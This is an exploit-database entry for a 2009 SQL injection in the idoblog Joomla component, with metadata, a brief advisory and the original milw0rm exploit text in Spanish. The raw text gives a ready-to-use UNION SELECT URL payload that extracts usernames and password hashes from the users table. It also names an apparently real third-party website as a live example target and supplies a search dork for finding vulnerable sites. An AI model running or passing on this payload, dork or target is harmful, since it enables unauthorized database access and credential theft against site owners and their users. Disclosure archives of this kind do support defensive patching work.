header-logo
Suggest Exploit
vendor:
idoblog
by:
KKR
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: idoblog
Affected Version From: v 1.1 (build 30)
Affected Version To: v 1.1 (build 30)
Patch Exists: YES
Related CWE: N/A
CPE: a:sunshinestudio:idoblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla 1.5
2009

com_idoblog SQL Injection ALL VERSIONS

com_idoblog is vulnerable to SQL injection. All versions of the component are affected. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the application database and potentially execute arbitrary code.

Mitigation:

Upgrade to the latest version of com_idoblog component.
Source

Exploit-DB raw data:

#####################################################################################
####                    com_idoblog SQL Injection ALL VERSIONS	                 ####
#####################################################################################
#                                                                                   #
# Descubierto por : KKR                                                             # 
# Somos: knet, kiko, ricota, servl                                                  # 
# Contacto: elricota[*A*T*]gmail[*D*O*T]com                                         #                        
#####################################################################################
[+]	Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+]	Esta sql injection afecta todas las versiones. 
[-]
[+] exploit: 
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[+]
[-]	Ejemplo:
[+]	http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[-]
[+] d0rk: inurl:"com_idoblog"
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
[-----------------------------------------------------------------------------------]

note:
<name>idoblog</name>
<creationDate>17 07 2008</creationDate>
<author>Sunshine studio</author>
<authorEmail>kotofeus@mail.ru</authorEmail>
<authorUrl>http://sunshinestudio.ru</authorUrl>
<copyright>Sunshine studio</copyright>
<license>Creative Commons v3.0</license>
<version>v 1.1 (build 30)</version>
<description>Blogs-system for Joomla 1.5</description>

# milw0rm.com [2009-08-11]